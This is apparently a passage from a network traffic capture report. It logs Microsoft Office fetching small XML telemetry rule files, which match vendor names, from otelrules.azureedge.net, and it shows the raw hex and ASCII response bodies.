                                                  2024-10-31 19:50:40 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  46192.168.2.45235813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:40 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 423
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                  ETag: "0x8DC582BB7564CE8"
                                                  x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195040Z-16849878b786lft2mu9uftf3y40000000b6000000000qkcn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:40 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  47192.168.2.45236013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:41 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:41 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:41 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                  ETag: "0x8DC582B95C61A3C"
                                                  x-ms-request-id: a783173c-501e-008c-2349-27cd39000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195041Z-16849878b7828dsgct3vrzta7000000008b000000000ru6a
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:41 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  48192.168.2.45235913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:41 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:41 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:41 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 478
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                  ETag: "0x8DC582B9B233827"
                                                  x-ms-request-id: 6856914c-401e-0029-0667-279b43000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195041Z-16849878b78zqkvcwgr6h55x9n00000009dg00000000huww
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:41 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  49192.168.2.45236113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:41 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:41 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:41 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                  ETag: "0x8DC582BB046B576"
                                                  x-ms-request-id: 0ea7e480-a01e-0021-6779-2b814c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195041Z-159b85dff8fbvrz4hC1DFW730c000000013g00000000db72
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:41 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  50192.168.2.45236313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:41 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:41 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:41 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7D702D0"
                                                  x-ms-request-id: 4900665d-501e-0029-5111-29d0b8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195041Z-15b8d89586fzcfbd8we4bvhqds00000004u000000000nhdz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:41 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  51192.168.2.45236213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:41 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:41 UTC471INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:41 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 400
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2D62837"
                                                  x-ms-request-id: 9c195338-b01e-001e-74ce-2b0214000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195041Z-159b85dff8f2qnk7hC1DFWwa2400000000f00000000095bt
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:41 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  52192.168.2.45236513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:42 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:42 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 425
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                  ETag: "0x8DC582BBA25094F"
                                                  x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195042Z-16849878b78p8hrf1se7fucxk80000000aw000000000ct0s
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:42 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  53192.168.2.45236413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:42 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:42 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 475
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2BE84FD"
                                                  x-ms-request-id: 99f07890-301e-0051-29d2-2538bb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195042Z-16849878b786fl7gm2qg4r5y700000000a9g00000000a3aq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:42 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  54192.168.2.45236613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:42 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:42 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 448
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB389F49B"
                                                  x-ms-request-id: 6d7cc6e8-501e-007b-43e6-2a5ba2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195042Z-15b8d89586f8l5961kfst8fpb00000000nug00000000fcch
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:42 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  55192.168.2.45236713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:42 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:42 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 491
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B98B88612"
                                                  x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195042Z-16849878b78p49s6zkwt11bbkn00000009m000000000q4u4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:42 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  56192.168.2.45236813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:42 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:42 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 416
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                  ETag: "0x8DC582BAEA4B445"
                                                  x-ms-request-id: 5feeb856-001e-008d-0ae8-28d91e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195042Z-15b8d89586f989rkwt13xern5400000005ag000000006e7a
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
